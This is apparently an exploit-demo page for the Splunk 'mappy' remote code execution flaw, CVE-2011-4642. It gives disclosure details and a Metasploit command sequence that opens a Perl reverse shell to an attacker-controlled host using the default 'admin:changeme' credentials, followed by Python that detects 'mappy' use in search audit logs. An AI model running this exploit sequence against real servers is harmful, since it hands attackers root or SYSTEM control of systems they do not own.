CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo
Timeline :
Vulnerability discovered and reported to the vendor by Gary O’Leary-Steele
Coordinated public release of the vulnerability on 2011-12-12
Metasploit PoC provided on 2011-12-22
PoC provided by :
Gary O’Leary-Steele
juan vazquez
Reference(s) :
CVE-2011-4642
OSVDB-77695
SPL-45172
Affected version(s) :
Splunk 4.2 to 4.2.4
Tested on Ubuntu 10.04.3 LTS with :
Splunk 4.2.4
Description :
This module abuses a command execution vulnerability in the web-based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command, which allows attackers to run Python code. Exploiting it requires a valid Splunk user with the admin role. By default, this module uses “admin:changeme”, the default Administrator credentials for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.
Commands :
use exploit/multi/http/splunk_mappy_exec
set RHOST 192.168.178.110
set VHOST blackhole.zataz.loc
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id
uname -a
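For detection on a 4.2 to 4.2.4 instance, the following added example (not part of the original post or of the Metasploit module) flags audited searches that invoke ‘mappy’ as a pipeline command while ignoring the word inside quoted search terms. The record layout, field names and sample lines are constructed assumptions; adapt the regular expression to the audit format of your deployment.

```python
import re

# Assumed layout of a search audit record: "user=<name>, action=search, ..., search='<query>'".
# This layout is an assumption made for the example, not taken from the page.
RECORD = re.compile(r"user=(?P<user>[^,]+),\s*action=search\b.*?search='(?P<search>.*)'")

# Constructed sample records; the mappy arguments are a placeholder.
SAMPLE = [
    "user=admin, action=search, info=granted, search='search index=main error | stats count by host'",
    "user=admin, action=search, info=granted, search='search index=main | head 1 | mappy PLACEHOLDER_ARGS'",
    "user=alice, action=search, info=granted, search='search index=web \"a | mappy b\" | top uri'",
    "user=bob, action=edit_user, info=granted",
]

def split_stages(search):
    """Split a search string on pipes that are outside double-quoted strings."""
    stages, buf, in_quote, escaped = [], [], False, False
    for ch in search:
        if escaped:                      # character after a backslash is literal
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == '"':
            in_quote = not in_quote
        elif ch == "|" and not in_quote:
            stages.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    stages.append("".join(buf).strip())
    return stages

def uses_mappy(search):
    """True when any pipeline stage starts with the command name 'mappy'."""
    for stage in split_stages(search):
        tokens = stage.lstrip("[ ").split(None, 1)
        # Compared case-insensitively to stay conservative.
        if tokens and tokens[0].lower() == "mappy":
            return True
    return False

def flag_records(lines):
    """Return (user, search) for every search record that invokes mappy."""
    hits = []
    for line in lines:
        m = RECORD.search(line)
        if m and uses_mappy(m.group("search")):
            hits.append((m.group("user").strip(), m.group("search")))
    return hits

if __name__ == "__main__":
    for user, search in flag_records(SAMPLE):
        print(f"mappy invoked by {user}: {search}")
```

Because exploitation requires an admin-role account, hits are most useful when correlated with logins that still use the default “admin:changeme” credentials.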